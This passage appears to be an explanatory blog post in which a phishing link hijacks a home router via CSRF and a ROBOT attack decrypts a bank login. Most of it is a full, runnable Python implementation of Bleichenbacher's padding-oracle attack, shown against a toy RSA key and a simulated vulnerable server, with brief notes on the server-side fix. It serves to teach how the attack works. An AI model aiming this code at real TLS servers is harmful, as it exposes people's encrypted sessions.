It was late Friday afternoon when the email arrived saying he’d won a free cruise.

Philip quickly opened the email and clicked the link for more information, but there was nothing there.

What he didn’t know is that this cruise offer actually came from a hacker and not Cruise Giveaways of America. This was no ordinary link, either. Merely loading the page made Philip’s browser send a request to his home router, which exploited the router through cross-site request forgery and reconfigured it. Whoever controls the router controls every packet that passes through it, and now that was the hacker.

It wasn’t exactly Philip’s fault; the exploit had been posted to Full Disclosure a full two months earlier, but the vendor still hadn’t released a fix.

The cruise offer got Philip dreaming about vacations, and a few minutes later, he was wondering about the balance on his Bank of E savings account.

He opened a new browser tab and typed the bank’s address, being careful to use https:// for the secure site. HTTPS is not always as private as you might think, though. The request for this site activated malware on the hacked router, which sprang into action impersonating the bank’s secure server. As soon as Philip’s browser started negotiating a “secure” channel with what it believed was the bank, the hacked router relayed the handshake data back to the hacker’s command-and-control infrastructure.

Among that information is the secret Philip’s browser had chosen for the session (in TLS with RSA key exchange, the premaster secret from which the session keys are derived) and encrypted with the bank’s 2048-bit RSA public key. Normally, this encryption would be strong enough to resist years of cracking attempts, but in this case the bank’s web site is vulnerable to ROBOT (Return Of Bleichenbacher’s Oracle Threat), and that one encrypted secret can be recovered with relative ease without ever learning the bank’s private key.

The hacker’s ROBOT attack now puts an army of hacked routers to work recovering that secret.
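What the routers are actually doing is running Bleichenbacher’s padding-oracle attack: they repeatedly send the server modified versions of Philip’s encrypted secret and learn, from how the server reacts, whether each one decrypts to a block that starts with the PKCS#1 v1.5 bytes `00 02`. The following is an added example, not code from the original post or from any real bank or vendor. It builds a toy 128-bit RSA key (a real server uses 2048 bits and a 48-byte TLS premaster secret; the tiny key just makes the attack finish in seconds), models the vulnerable server as a function that leaks only that one bit, and recovers the plaintext from the ciphertext alone. The key, the secret `b"pms"` and the oracle are all constructed here for illustration.

```python
"""Added example: Bleichenbacher (ROBOT-style) padding-oracle attack on RSA PKCS#1 v1.5.

Constructed toy setup: a 128-bit key and a 3-byte secret, so the attack runs in seconds.
Nothing here comes from a real server; the oracle stands in for a ROBOT-vulnerable TLS host.
"""
import random
from math import gcd


def is_probable_prime(n):
    # Deterministic Miller-Rabin; these bases are exact for every n below 3.3e24.
    bases = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)
    if n < 2:
        return False
    for p in bases:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for a in bases:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits):
    while True:
        candidate = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(candidate):
            return candidate


def make_keypair(bits=128):
    """Toy RSA keypair (n, e, d). Far too small for real use; chosen for speed."""
    e = 65537
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and gcd(e, phi) == 1:
            return p * q, e, pow(e, -1, phi)


def pkcs1_v15_pad(msg, k):
    """00 02 <at least 8 random non-zero bytes> 00 <msg>, k bytes total (RSAES-PKCS1-v1_5)."""
    assert len(msg) <= k - 11
    ps = bytes(random.randrange(1, 256) for _ in range(k - 3 - len(msg)))
    return b"\x00\x02" + ps + b"\x00" + msg


def pkcs1_v15_unpad(block):
    if block[:2] != b"\x00\x02":
        return None
    sep = block.find(b"\x00", 2)
    return None if sep < 10 else block[sep + 1:]


class PaddingOracle:
    """Models a ROBOT-vulnerable server: its behaviour reveals whether the decrypted
    block begins with 00 02. In real ROBOT the 'bit' is a differing TLS alert or timing."""

    def __init__(self, d, n, k):
        self.d, self.n, self.k, self.queries = d, n, k, 0

    def __call__(self, c):
        self.queries += 1
        return pow(c, self.d, self.n).to_bytes(self.k, "big")[:2] == b"\x00\x02"


def bleichenbacher(c, e, n, k, oracle):
    """Recover m from c = m^e mod n using only the padding oracle (Bleichenbacher 1998)."""
    B = 1 << (8 * (k - 2))
    B2, B3 = 2 * B, 3 * B
    ceil_div = lambda a, b: -(-a // b)
    conformant = lambda s: oracle((c * pow(s, e, n)) % n)

    assert oracle(c), "the captured ciphertext itself is properly padded, so s0 = 1"
    M = [(B2, B3 - 1)]                      # m is known to lie in [2B, 3B)
    s = ceil_div(n, B3)                     # step 2a: smallest s that can wrap s*m past n
    while not conformant(s):
        s += 1
    while True:
        # Step 3: every conformant s*m mod n narrows the candidate intervals for m.
        new_M = []
        for a, b in M:
            for r in range(ceil_div(a * s - B3 + 1, n), (b * s - B2) // n + 1):
                lo = max(a, ceil_div(B2 + r * n, s))
                hi = min(b, (B3 - 1 + r * n) // s)
                if lo <= hi:
                    new_M.append((lo, hi))
        new_M.sort()
        M = []
        for a, b in new_M:                  # merge overlapping/adjacent intervals
            if M and a <= M[-1][1] + 1:
                M[-1] = (M[-1][0], max(M[-1][1], b))
            else:
                M.append((a, b))
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0]                  # interval collapsed: this is m (s0 was 1)
        if len(M) > 1:                      # step 2b: several intervals, just scan upward
            s += 1
            while not conformant(s):
                s += 1
        else:                               # step 2c: one interval, halve it per iteration
            a, b = M[0]
            r = ceil_div(2 * (b * s - B2), n)
            while True:
                hit = next((t for t in range(ceil_div(B2 + r * n, b), (B3 - 1 + r * n) // a + 1)
                            if conformant(t)), None)
                if hit is not None:
                    s = hit
                    break
                r += 1


def run_demo(seed=1, bits=128, secret=b"pms"):
    """Encrypt a constructed secret, then recover it through the oracle alone."""
    random.seed(seed)
    n, e, d = make_keypair(bits)
    k = (n.bit_length() + 7) // 8
    m = int.from_bytes(pkcs1_v15_pad(secret, k), "big")
    c = pow(m, e, n)                        # what the router captured from Philip's browser
    oracle = PaddingOracle(d, n, k)
    recovered = pkcs1_v15_unpad(bleichenbacher(c, e, n, k, oracle).to_bytes(k, "big"))
    return {"success": recovered == secret, "secret": recovered, "queries": oracle.queries}


if __name__ == "__main__":
    print(run_demo())
```

The query count the demo reports is the point of the story’s “army of routers”: even with the weakest oracle (only the first two bytes checked) the attack needs tens of thousands of decryption attempts, which is noisy from one IP address but invisible when spread across many hacked routers. The fix on the server side is to stop offering RSA key exchange (or patch the padding check so every failure looks identical), since no amount of key length helps when the server itself answers the attacker’s questions.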

This process involves repeatedly trying to connect to the server